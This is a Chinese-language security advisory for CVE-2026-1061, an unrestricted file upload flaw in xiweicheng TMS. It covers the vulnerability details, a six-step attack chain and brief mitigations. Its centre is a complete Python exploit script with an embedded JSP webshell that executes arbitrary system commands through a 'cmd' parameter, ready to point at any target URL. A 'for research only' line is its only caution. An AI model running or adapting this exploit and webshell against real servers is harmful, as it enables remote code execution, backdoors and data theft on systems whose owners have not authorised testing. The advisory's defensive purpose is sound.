CVE-2026-1061 xiweicheng TMS未授权文件上传漏洞

漏洞信息

漏洞编号

CVE-2026-1061

漏洞类型

未限制文件上传

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

xiweicheng TMS

漏洞概述

CVE-2026-1061是xiweicheng TMS系统中存在的一个高危安全漏洞，存在于文件上传功能模块中。该漏洞允许具有低权限的远程攻击者通过构造恶意的文件名参数，上传任意文件到服务器文件系统，从而可能导致远程代码执行、敏感信息泄露或服务器被完全控制。由于该漏洞可远程利用且无需用户交互，攻击门槛较低，对使用受影响版本xiweicheng TMS的组织构成严重安全威胁。漏洞影响范围涵盖xiweicheng TMS 2.28.0及之前的所有版本，目前该漏洞的利用代码已在公开领域出现，建议受影响的用户尽快采取修复措施。

技术细节

该漏洞源于FileController.java文件中的Upload函数对用户提交的filename参数缺乏充分的验证和过滤。攻击者可以通过HTTP请求构造包含恶意扩展名或路径遍历字符的文件名，绕过服务器端的上传限制。具体而言，漏洞利用过程涉及以下几个关键点：首先，攻击者向文件上传接口发送POST请求，在filename参数中注入恶意文件名（如包含.jsp、.php等可执行脚本扩展名，或使用../进行路径遍历）；其次，由于程序未对filename进行严格的类型检查和内容验证，恶意文件可能被保存到可执行目录；最后，攻击者通过访问上传的恶意文件即可在服务器上执行任意代码。攻击者成功利用此漏洞可实现服务器权限获取、数据窃取、植入后门等恶意操作。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的xiweicheng TMS版本，确认版本号<=2.28.0

STEP 2

步骤2: 漏洞探测

攻击者访问文件上传接口/file/upload，发送测试请求验证漏洞存在性

STEP 3

步骤3: 构造恶意请求

攻击者构造包含恶意文件名（如shell.jsp）和webshell payload的POST请求

STEP 4

步骤4: 文件上传

攻击者通过filename参数注入恶意文件名，绕过服务器验证并上传webshell

STEP 5

步骤5: 触发代码执行

攻击者访问上传的webshell文件，通过cmd参数执行系统命令

STEP 6

步骤6: 持久化控制

攻击者利用服务器权限植入后门、窃取数据或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-1061 PoC - xiweicheng TMS Unrestricted File Upload
# Target: xiweicheng TMS <= 2.28.0
# Vulnerable endpoint: /file/upload (FileController.java Upload function)

def exploit(target_url, filename='shell.jsp', payload='<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("cmd") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>'):
    """
    Exploit for CVE-2026-1061: Unrestricted file upload in xiweicheng TMS
    
    Args:
        target_url: Base URL of the vulnerable application
        filename: Malicious filename to upload
        payload: JSP webshell payload
    
    Returns:
        bool: True if upload successful, False otherwise
    """
    upload_url = f"{target_url}/file/upload" if not target_url.endswith('/') else f"{target_url}file/upload"
    
    files = {
        'file': (filename, payload, 'application/octet-stream')
    }
    
    data = {
        'filename': filename  # Vulnerable parameter
    }
    
    try:
        response = requests.post(upload_url, files=files, data=data, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] File uploaded successfully: {filename}")
            print(f"[+] Access the shell at: {target_url}/uploads/{filename}")
            print(f"[+] Example command execution: {target_url}/uploads/{filename}?cmd=whoami")
            return True
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url> [filename]")
        print(f"Example: python {sys.argv[0]} http://target.com shell.jsp")
        sys.exit(1)
    
    target = sys.argv[1]
    filename = sys.argv[2] if len(sys.argv) > 2 else 'shell.jsp'
    
    exploit(target, filename)

影响范围

xiweicheng TMS <= 2.28.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制文件上传功能的访问权限，仅允许授权用户使用；2）配置WAF（Web应用防火墙）规则，对包含路径遍历字符（../）和危险扩展名（.jsp、.php、.asp）的上传请求进行拦截；3）临时禁用文件上传功能，待官方修复后再恢复；4）加强对上传目录的监控，及时发现异常文件写入行为；5）使用IPS/IDS设备对可疑的上传行为进行告警和阻断。